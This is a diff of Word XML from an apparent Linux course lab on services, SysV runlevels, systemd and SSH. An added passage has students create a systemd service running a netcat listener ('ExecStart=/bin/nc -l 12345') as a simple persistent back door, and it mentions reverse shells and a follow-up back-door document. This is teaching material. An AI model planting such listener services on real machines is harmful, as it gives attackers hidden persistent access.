-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> executable is in a different place in Ubuntu 18</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> (/bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> vs. his /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>machine and gives the attacker a remote shell (ouch</w:t>
+      </w:r>
       <w:r>
         <w:t>.</w:t>
       </w:r>
       <w:r>
         <w:t>)</w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  His method is a reverse shell that causes the compromised box to connect back to the attack</w:t>
-      </w:r>
-      <w:r>
-        <w:t>er’s</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> machine.  To do that, you would need another machine running a netcat listener on &lt;PORT&gt;.  This very simple listener is easier (but not as useful, alas.)  Also, the -e option to export a command prompt is not available </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">on </w:t>
-      </w:r>
-      <w:r>
-        <w:t>default</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Ubuntu</w:t>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">This very simple listener is easier (but not as useful, alas.)  </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">It will just </w:t>
+      </w:r>
+      <w:r>
+        <w:t>allow a remote machine to connect and send data</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
       </w:r>
       <w:r>
-        <w:br/>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>ExecStart</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>=/bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -l 12345</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-        <w:t xml:space="preserve">With the version here you can see if it is running with </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>netstat -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>na</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.  (Or you can connect to it from your host or another VM with netcat.)</w:t>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">There are ways </w:t>
+      </w:r>
+      <w:r>
+        <w:t>to make this a full-fledged back door</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, but they are too complicated for this lab.)</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>ExecStart=/bin/nc -l 1234</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>5</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Once you have enabled, then started the new service you made, you can see if the service is running with </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">with </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>ss</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>nat</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.  Later on we will make a real back door.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Extra Extra Fun</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>If you</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> want to turn this into a real, working back door see the document </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>systemd-backdoor.docx</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
@@ -2673,6 +2280,95 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="097A4D3D"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="9A146576"/>
+    <w:lvl w:ilvl="0" w:tplc="04090011">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="13611D58"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="CE94A618"/>
@@ -2761,7 +2457,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4B413783"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="612E7A6E"/>
@@ -2851,10 +2547,13 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
-    <w:abstractNumId w:val="0"/>
+    <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="1"/>
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="3">
+    <w:abstractNumId w:val="0"/>
   </w:num>
 </w:numbering>
 </file>

--- a/3.Linux/05.Apps and Services/Linux Lab 5 Apps and Services.docx
+++ b/3.Linux/05.Apps and Services/Linux Lab 5 Apps and Services.docx
@@ -78,7 +78,21 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t xml:space="preserve">The most important things are the day to day uses:  </w:t>
+        <w:t xml:space="preserve">The most important things are the day to day </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>uses:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -116,7 +130,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Most Linux distros have replaced SysV with systemd; Ubuntu 15 and up, CentOS 7 and up, and Fedora 14 and up.  However, systemd retains backward compatibility with SysV.  We still need to know the basics of SysV since attackers can use SysV to enable backdoor services that automatically start at reboot so they don’t lose their hold on the computer.  </w:t>
+        <w:t xml:space="preserve">Most Linux distros have replaced SysV with systemd; Ubuntu 15 and up, CentOS 7 and up, and Fedora 14 and up.  However, systemd retains backward compatibility with SysV.  We still need to know the basics of SysV since attackers can use SysV to enable backdoor services that automatically start at </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>reboot</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> so they don’t lose their hold on the computer.  </w:t>
       </w:r>
       <w:r>
         <w:t>(The security term for this is persistence.)</w:t>
@@ -242,7 +264,15 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">If you were to Google “install ssh server on ubuntu desktop” you would find that the common SSH installation is called openssh-server.  You can find it in the Ubuntu Software Center GUI, </w:t>
+        <w:t xml:space="preserve">If you were to Google “install ssh server on ubuntu desktop” you would find that the common SSH installation is called </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>openssh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">-server.  You can find it in the Ubuntu Software Center GUI, </w:t>
       </w:r>
       <w:r>
         <w:t>or</w:t>
@@ -257,7 +287,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>sudo apt install openssh-server</w:t>
+        <w:t xml:space="preserve">sudo apt install </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>openssh</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>-server</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -311,8 +355,44 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>/usr/sbin/sshd</w:t>
-      </w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>sbin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>sshd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
@@ -320,7 +400,15 @@
         <w:t>for SSH Daemon.  The service</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> name is ssh in Ubuntu; in RedHat variants it is called sshd.  Go figure.</w:t>
+        <w:t xml:space="preserve"> name is ssh in Ubuntu; in RedHat variants it is called </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sshd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.  Go figure.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -419,7 +507,15 @@
         <w:t xml:space="preserve"> command </w:t>
       </w:r>
       <w:r>
-        <w:t>to stop, start, and restart the sshd service.  Each time you change the service, use</w:t>
+        <w:t xml:space="preserve">to stop, start, and restart the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sshd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> service.  Each time you change the service, use</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -446,7 +542,21 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>When you are done, make sure the sshd service is stopped.</w:t>
+        <w:t xml:space="preserve">When you are done, make sure the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>sshd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> service is stopped.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -457,8 +567,16 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>ls /etc</w:t>
-      </w:r>
+        <w:t>ls /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -472,7 +590,35 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t xml:space="preserve"> ls /etc/rc*</w:t>
+        <w:t xml:space="preserve"> ls /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>rc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>*</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -484,8 +630,16 @@
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
         </w:rPr>
-        <w:t>to see just directories that start with rc</w:t>
-      </w:r>
+        <w:t xml:space="preserve">to see just directories that start with </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>rc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -493,7 +647,15 @@
         <w:t>)</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> on your Ubuntu VM, you should be able to find the rc </w:t>
+        <w:t xml:space="preserve"> on your Ubuntu VM, you should be able to find the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>rc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>directories</w:t>
@@ -526,7 +688,21 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>ls -l /etc/rc</w:t>
+        <w:t>ls -l /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/rc</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -597,25 +773,93 @@
         <w:t>The symbolic links</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> (symlinks)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> in /etc/rc</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>symlinks</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> in /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/rc</w:t>
       </w:r>
       <w:r>
         <w:t>5</w:t>
       </w:r>
       <w:r>
-        <w:t>.d point to files in the /etc/init and /etc/init</w:t>
+        <w:t>.d point to files in the /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>init</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
       </w:r>
       <w:r>
-        <w:t>d directories.  Look at the contents of those directories as well.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  If you look at the contents of one of the files in the /etc/init.d </w:t>
+        <w:t>d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> directories.  Look at the contents of those directories as well.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  If you look at the contents of one of the files in the /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>etc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>init.d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t>directory</w:t>
@@ -624,7 +868,31 @@
         <w:t>, you will see it contains a shell script.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">  Remember, in SysV the init program looks at the files in the proper run level directory and then executes the files the symlinks point to.  It uses symlinks to avoid duplicate copies of a file that is executed by multiple run levels</w:t>
+        <w:t xml:space="preserve">  Remember, in SysV the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> program looks at the files in the proper run level directory and then executes the files the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>symlinks</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> point to.  It uses </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>symlinks</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> to avoid duplicate copies of a file that is executed by multiple run levels</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -680,77 +948,211 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">Note:  In other distros like CentOS, there is no init directory, since init is the name of the command used to change </w:t>
-      </w:r>
+        <w:t xml:space="preserve">Note:  In other distros like CentOS, there is no </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>run level</w:t>
-      </w:r>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">s.  Also, the files are kept in (say for </w:t>
-      </w:r>
+        <w:t xml:space="preserve"> directory, since </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>run level</w:t>
-      </w:r>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 5) </w:t>
-      </w:r>
